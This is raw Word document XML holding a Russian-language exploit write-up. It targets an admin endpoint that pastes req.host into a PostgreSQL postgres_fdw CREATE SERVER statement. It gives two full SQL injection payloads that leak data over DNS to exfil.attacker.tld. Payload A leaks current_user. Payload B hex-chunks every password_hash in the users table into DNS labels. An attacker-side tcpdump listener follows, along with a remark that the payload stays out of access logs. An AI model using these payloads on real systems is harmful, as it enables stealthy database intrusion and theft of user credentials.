          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        f"CREATE SERVER IF NOT EXISTS {req.name} "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        f"FOREIGN DATA WRAPPER postgres_fdw "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        f"OPTIONS (host '{req.host}', port '{req.port}', dbname '{req.dbname}'); "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        f"END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session.execute(sql)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    log.info("admin.foreign_source_registered", name=req.name)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return {"status": "registered"}</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req.host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> напрямую в строковый литерал </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OPTIONS (host '...')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Эндпоинт защищён только аутентификацией admin-роли — никакой валидации значений. JSON-body не торчит в Common Log Format → payload не виден в access-логе.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload A — DNS-канал, простой (current_user)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Внедрение в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> закрывает литерал OPTIONS, дальше внутри уже-открытого </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DO $$ BEGIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-блока добавляется атакующая цепочка через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE format('... %L ...', current_user || '.exfil.attacker.tld')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Прямо в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OPTIONS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> подставить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нельзя — OPTIONS принимает только строковые литералы, не выражения. Поэтому динамический SQL обязателен.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload (подставляется вместо `req.host`):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">', port '5432', dbname 'x'); EXECUTE format('CREATE SERVER ev FOREIGN DATA WRAPPER postgres_fdw OPTIONS (host %L)', current_user || '.exfil.attacker.tld'); CREATE USER MAPPING FOR CURRENT_USER SERVER ev OPTIONS (user 'x', password 'x'); CREATE FOREIGN TABLE t_ev(c text) SERVER ev OPTIONS (table_name 't'); PERFORM * FROM t_ev; END $$;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DO $$ BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE SERVER IF NOT EXISTS app_src</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FOREIGN DATA WRAPPER postgres_fdw</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OPTIONS (host '', port '5432', dbname 'x');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE format(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    'CREATE SERVER ev FOREIGN DATA WRAPPER postgres_fdw OPTIONS (host %L)',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    current_user || '.exfil.attacker.tld'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CREATE USER MAPPING FOR CURRENT_USER SERVER ev OPTIONS (user 'x', password 'x');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE FOREIGN TABLE t_ev(c text) SERVER ev OPTIONS (table_name 't');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PERFORM * FROM t_ev;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">END $$; --', port '5432', dbname 'main'); END $$;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PERFORM * FROM t_ev</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> запускает коннект к foreign server — libpq делает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">getaddrinfo("app_user.exfil.attacker.tld")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, DNS-запрос приходит на authoritative-сервер атакующего. TCP-коннект потом упадёт (никто не слушает) — payload уже сработал на этапе DNS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">На стороне атакующего:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tcpdump -i any -nn 'port 53' | grep exfil.attacker.tld</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload B — DNS-канал, chunked hex (полная таблица)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Та же цепочка через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE format</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, но host собирается из chunks. Hex-encoding с chunk-size 60 (лимит RFC 1035 на DNS label ≤63 байт). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LOOP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> внутри </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-блока создаёт по одному foreign server на каждый chunk — каждый SELECT запускает свой DNS-запрос. При пустой таблице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generate_series(0, -1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> вернёт пустое множество — итераций цикла не будет, это штатное поведение.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload (подставляется вместо `req.host`):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">', port '5432', dbname 'x'); DECLARE rec record; BEGIN FOR rec IN WITH data AS (SELECT encode(convert_to((SELECT string_agg(password_hash, ',') FROM users), 'UTF8'), 'hex') AS hex) SELECT substring(hex FROM (i*60+1) FOR 60) AS c FROM data, generate_series(0, (length(hex)-1)/60) i LOOP EXECUTE format('CREATE SERVER IF NOT EXISTS ev_%s FOREIGN DATA WRAPPER postgres_fdw OPTIONS (host %L)', md5(rec.c), rec.c || '.exfil.attacker.tld'); EXECUTE format('CREATE USER MAPPING IF NOT EXISTS FOR CURRENT_USER SERVER ev_%s OPTIONS (user ''x'', password ''x'')', md5(rec.c)); EXECUTE format('CREATE FOREIGN TABLE IF NOT EXISTS t_%s(c text) SERVER ev_%s OPTIONS (table_name ''t'')', md5(rec.c), md5(rec.c)); EXECUTE format('SELECT 1 FROM t_%s', md5(rec.c)); END LOOP; END $$;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DO $$ BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE SERVER IF NOT EXISTS app_src</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FOREIGN DATA WRAPPER postgres_fdw</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OPTIONS (host '', port '5432', dbname 'x');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DECLARE rec record;</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FOR rec IN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        WITH data AS (</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            SELECT encode(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                convert_to((SELECT string_agg(password_hash, ',') FROM users), 'UTF8'),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                'hex'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            ) AS hex</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substring(hex FROM (i*60+1) FOR 60) AS c</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        FROM data, generate_series(0, (length(hex)-1)/60) i</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
